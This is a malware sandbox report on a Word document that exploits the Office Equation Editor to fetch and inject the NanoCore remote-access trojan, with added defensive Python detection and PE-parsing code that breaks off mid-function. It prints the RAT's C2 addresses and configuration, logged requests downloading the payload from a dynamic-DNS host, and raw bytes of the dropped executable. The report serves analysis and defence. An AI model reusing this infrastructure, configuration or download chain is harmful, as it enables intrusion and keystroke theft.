
Analysis Report 471e3984_by_Libranalysis

Overview

General Information

Sample Name: 471e3984_by_Libranalysis (renamed file extension from none to docx)
Analysis ID: 402828
MD5: 471e39840386d6b9c8e565123a389364
SHA1: d9050e2115ee03a7c8e0acc87d199ce0b4b7422a
SHA256: 012300706ce75e6e82abdaa865aa8ff684aef99eda98f9094278b8df84e9642c

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Contains an external reference to another document
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 152 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2904 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2860 cmdline: 'C:\Users\Public\vbc.exe' MD5: 042AA11C6D49E1CCA5923F02D1B0A5AE)
      • RegSvcs.exe (PID: 3040 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
      • RegSvcs.exe (PID: 3036 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
      • RegSvcs.exe (PID: 2988 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x5fee:$x1: NanoCore.ClientPluginHost
  • 0x602b:$x2: IClientNetworkHost
00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x5fee:$x2: NanoCore.ClientPluginHost
  • 0x9441:$s4: PipeCreated
  • 0x6018:$s5: IClientLoggingHost
00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost
00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x350b:$x2: NanoCore.ClientPluginHost
  • 0x52b6:$s4: PipeCreated
  • 0x34f8:$s5: IClientLoggingHost
00000009.00000002.2388645448.00000000008A0000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x5b99:$x1: NanoCore.ClientPluginHost
  • 0x5bb3:$x2: IClientNetworkHost
(36 entries in total; only the first five are shown here)

Unpacked PEs

Source | Rule | Description | Author
9.2.RegSvcs.exe.3824d52.23.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x2dbb:$x1: NanoCore.ClientPluginHost
  • 0x2de5:$x2: IClientNetworkHost
9.2.RegSvcs.exe.3824d52.23.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x2dbb:$x2: NanoCore.ClientPluginHost
  • 0x4c6b:$s4: PipeCreated
9.2.RegSvcs.exe.8a0000.11.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x5b99:$x1: NanoCore.ClientPluginHost
  • 0x5bb3:$x2: IClientNetworkHost
9.2.RegSvcs.exe.8a0000.11.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x5b99:$x2: NanoCore.ClientPluginHost
  • 0x6bce:$s4: PipeCreated
  • 0x5b86:$s5: IClientLoggingHost
9.2.RegSvcs.exe.3830f84.24.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x8ba5:$x1: NanoCore.ClientPluginHost
  • 0x15d0e:$x1: NanoCore.ClientPluginHost
  • 0x1c25c:$x1: NanoCore.ClientPluginHost
  • 0x2222d:$x1: NanoCore.ClientPluginHost
  • 0x2bc99:$x1: NanoCore.ClientPluginHost
  • 0x360c4:$x1: NanoCore.ClientPluginHost
  • 0x410a1:$x1: NanoCore.ClientPluginHost
  • 0x4ce43:$x1: NanoCore.ClientPluginHost
  • 0x6231b:$x1: NanoCore.ClientPluginHost
  • 0x8a57d:$x1: NanoCore.ClientPluginHost
  • 0x999bd:$x1: NanoCore.ClientPluginHost
  • 0xb1849:$x1: NanoCore.ClientPluginHost
  • 0xd9a97:$x1: NanoCore.ClientPluginHost
  • 0x8bd2:$x2: IClientNetworkHost
  • 0x15d47:$x2: IClientNetworkHost
  • 0x1c295:$x2: IClientNetworkHost
  • 0x2bdf6:$x2: IClientNetworkHost
  • 0x360fd:$x2: IClientNetworkHost
  • 0x410bb:$x2: IClientNetworkHost
  • 0x4ce5d:$x2: IClientNetworkHost
  • 0x62348:$x2: IClientNetworkHost
(83 entries in total; only the first five are shown here)

Sigma Overview

System Summary:

Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2904, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe
Sigma detected: NanoCore
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2988, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
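Both Sigma hits are Sysmon EventID 11 (file create) records, and together with the Startup tree they describe the whole chain: EQNEDT32.EXE writes vbc[1].exe into the IE cache, spawns C:\Users\Public\vbc.exe, which in turn starts RegSvcs.exe, which writes run.dat under a GUID-named folder in AppData\Roaming. The following is an added example, not code from the report or from Joe Security: it encodes those three conditions as predicates over Sysmon-style events and rebuilds the process lineage from EventID 1 records, run over constructed events. The PIDs, image paths and the run.dat path are the report's; the parent PIDs for WINWORD.EXE and EQNEDT32.EXE (explorer.exe and svchost.exe) and the two benign events are assumptions made for the example.

```python
"""Detection logic for the Sigma hits above and for "Office equation editor
starts processes", run over constructed Sysmon-style events.  Added example,
not code from the report or from Joe Security.  Parent PIDs for WINWORD.EXE
and EQNEDT32.EXE and the benign events are assumptions."""
import re

# Constructed events.  EventID 1 = process create, EventID 11 = file create.
EVENTS = [
    {"EventID": 1, "ProcessId": 152, "ParentProcessId": 1000, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"},
    {"EventID": 1, "ProcessId": 2904, "ParentProcessId": 600, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"},
    {"EventID": 11, "ProcessId": 2904, "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe"},
    {"EventID": 1, "ProcessId": 2860, "ParentProcessId": 2904,
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Users\Public\vbc.exe"},
    {"EventID": 1, "ProcessId": 2988, "ParentProcessId": 2860, "ParentImage": r"C:\Users\Public\vbc.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"},
    {"EventID": 11, "ProcessId": 2988, "Image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat"},
    # Benign noise: Word writing its own scratch file, a user opening notepad.
    {"EventID": 11, "ProcessId": 152, "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE4CB73-349E-46EF-BF24-C3A751787722}.tmp"},
    {"EventID": 1, "ProcessId": 3100, "ParentProcessId": 1000, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe"},
]

# GUID-named folder under Roaming ending in run.dat, the shape of the report's NanoCore hit.
RUN_DAT_RE = re.compile(
    r"\\AppData\\Roaming\\[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\\run\.dat$", re.IGNORECASE)

def is_eqnedt32(path):
    return path.lower().endswith(r"\eqnedt32.exe")

RULES = {
    # Sigma "File Dropped By EQNEDT32EXE": the Equation Editor writing a file is exploitation in practice.
    "file_dropped_by_eqnedt32": lambda e: e["EventID"] == 11 and is_eqnedt32(e["Image"]),
    # "Office equation editor starts processes": EQNEDT32.EXE has no legitimate child processes.
    "eqnedt32_spawns_process": lambda e: e["EventID"] == 1 and is_eqnedt32(e["ParentImage"]),
    # Sigma "NanoCore": run.dat in a GUID-named Roaming folder.
    "nanocore_run_dat": lambda e: e["EventID"] == 11 and RUN_DAT_RE.search(e["TargetFilename"]) is not None,
}

def evaluate(events):
    """Return (rule_name, ProcessId) for every event/rule pair that matches, in event order."""
    return [(name, e["ProcessId"]) for e in events for name, pred in RULES.items() if pred(e)]

def lineage(events, pid):
    """Walk ParentProcessId links through EventID 1 records; image basenames, root first."""
    by_pid = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["Image"].rsplit("\\", 1)[-1])
        pid = by_pid[pid]["ParentProcessId"]
    return chain[::-1]

if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:26} pid={pid:<5} chain={' -> '.join(lineage(EVENTS, pid))}")
```

Note that EQNEDT32.EXE is started over DCOM rather than by WINWORD.EXE, which is why the report's Startup tree shows the two as siblings; a detection that requires WINWORD.EXE as the parent of the Equation Editor would miss this chain. The lineage walk stops at the first PID without an EventID 1 record, which is why the chain for RegSvcs.exe begins at EQNEDT32.EXE rather than at svchost.exe.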

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\v[1].doc | Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B75759.doc | Avira: detection malicious, Label: HEUR/Rtf.Malformed
Found malware configuration
Source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack | Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe | ReversingLabs: Detection: 23%
Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 23%
Yara detected Nanocore RAT
Source: Yara match | File source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY
Source: Yara match | File source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.9a0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.9a0000.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.9a4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.381ff26.25.raw.unpack, type: UNPACKEDPE
Source: 9.2.RegSvcs.exe.9a0000.14.unpack | Avira: Label: TR/NanoCore.fadte
Source: 9.2.RegSvcs.exe.400000.1.unpack | Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: Binary string: ystem.pdb source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source: Binary string: Rbvcs.pdbs~ source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source: Binary string: pC:\Windows\System.pdb source: RegSvcs.exe, 00000009.00000002.2390017594.0000000004D9C000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000009.00000002.2389919111.000000000473D000.00000004.00000001.sdmp
Source: Binary string: System.pdbX source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: vbc.exe, 00000006.00000002.2131108315.0000000000E70000.00000002.00000001.sdmp, RegSvcs.exe, 00000009.00000002.2388359155.0000000000540000.00000002.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | Code function: 4x nop then mov esp, ebp | 9_2_0039AF31
Source: global traffic | DNS query: name: cutt.ly
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443 (2 entries)

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49169 -> 172.67.8.238:80
Source: Traffic | Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49170 -> 172.67.8.238:80
Source: Traffic | Snort IDS: 3132 WEB-CLIENT PNG large image width download attempt 172.245.45.28:80 -> 192.168.2.22:49175
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: 79.134.225.26
Source: Malware configuration extractor | URLs: nassiru1166main.ddns.net
Uses dynamic DNS services
Source: unknown | DNS query: name: nassiru1166main.ddns.net
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 79.134.225.26:1133
Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Date: Mon, 03 May 2021 12:31:02 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
Last-Modified: Mon, 03 May 2021 07:22:11 GMT
ETag: "116c00-5c167d1eb0284"
Accept-Ranges: bytes
Content-Length: 1141760
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a3 a4 8f 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 58 11 00 00 12 00 00 00 00 00 00 92 77 11 00 00 20 00 00 00 80 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 77 11 00 4f 00 00 00 00 80 11 00 d0 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 57 11 00 00 20 00 00 00 58 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 0e 00 00 00 80 11 00 00 10 00 00 00 5a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 11 00 00 02 00 00 00 6a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 77 11 00 00 00 00 00 48 00 00 00 02 00 05 00 04 84 00 00 3c 99 00 00 03 00 00 00 01 00 00 06 40 
1d 01 00 00 5a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 60 01 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a
Source: Joe Sandbox View | IP Address: 172.67.8.238
Source: Joe Sandbox View | IP Address: 79.134.225.26
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: FINK-TELECOM-SERVICESCH
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic | HTTP traffic detected:
GET /reg/v.dot HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: nta.hopto.org
Source: global traffic | HTTP traffic detected:
GET /reg/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: nta.hopto.org
Connection: Keep-Alive
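The two GET requests and the 200 response above are the download stage: the first request (sent with the ms-office / MSOffice 14 user agent, i.e. by Word itself following the external reference) fetches the template v.dot, the second (sent with a plain IE user agent, i.e. by the Equation Editor after exploitation) fetches vbc.exe, and the response body begins with 4d 5a (MZ), carries a PE signature at offset 0x80 and is labelled application/x-msdownload. The "Downloads executable code via HTTP" signature keys on the bytes, not the label. The following is an added example, not part of the report: a small PE header parser that makes the same decision from the body and pulls out the fields a responder wants (machine, sections, build timestamp, whether a CLR header is present). The sample image is constructed with struct.pack to carry the header values visible in the report's raw dump (Machine 0x14c, 3 sections, TimeDateStamp 0x608fa4a3, CLR directory at RVA 0x2008 / size 0x48); it is not the dropped binary. The response headers are the report's; the text/html and image/png negative cases are constructed.

```python
"""Decide from the bytes whether an HTTP response body is a Windows
executable, as the 'Downloads executable code via HTTP' signature above
does, and extract the header fields a responder wants.  Added example, not
part of the report.  build_sample_pe() constructs a minimal PE32 header with
the values visible in the report's raw dump; it is not the dropped binary."""
import struct
from datetime import datetime, timezone

CLR_DIRECTORY = 14          # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
EXE_CONTENT_TYPES = {"application/x-msdownload", "application/x-dosexec",
                     "application/vnd.microsoft.portable-executable", "application/octet-stream"}

def parse_pe(blob):
    """Return key PE header fields, or None if blob is not a PE image."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 24 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 0x70 or opt + opt_size + 40 * nsections > len(blob):
        return None                                   # truncated or malformed headers
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == 0x10B:                                # PE32
        ndirs_off, dirs_off = opt + 0x5C, opt + 0x60
    elif magic == 0x20B:                              # PE32+
        ndirs_off, dirs_off = opt + 0x6C, opt + 0x70
    else:
        return None
    ndirs = struct.unpack_from("<I", blob, ndirs_off)[0]
    clr_rva = clr_size = 0
    clr_off = dirs_off + 8 * CLR_DIRECTORY
    if ndirs > CLR_DIRECTORY and clr_off + 8 <= opt + opt_size:
        clr_rva, clr_size = struct.unpack_from("<II", blob, clr_off)
    names = [struct.unpack_from("<8s", blob, opt + opt_size + 40 * i)[0].rstrip(b"\0").decode("latin-1")
             for i in range(nsections)]
    return {
        "machine": machine, "pe32plus": magic == 0x20B, "sections": names, "timestamp": timestamp,
        "compiled_utc": datetime.fromtimestamp(timestamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "is_dotnet": clr_rva != 0 and clr_size != 0,  # populated CLR directory => managed image
        "is_dll": bool(chars & 0x2000),
    }

def classify_response(headers, body):
    """headers: dict with lower-cased names.  Trust the bytes, not the label."""
    pe = parse_pe(body)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    return {"executable": pe is not None, "pe": pe, "content_type": ctype,
            "label_mismatch": pe is not None and ctype not in EXE_CONTENT_TYPES}

def build_sample_pe():
    """Constructed PE32 header carrying the values the report's dump shows."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                              # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, 0x608FA4A3, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
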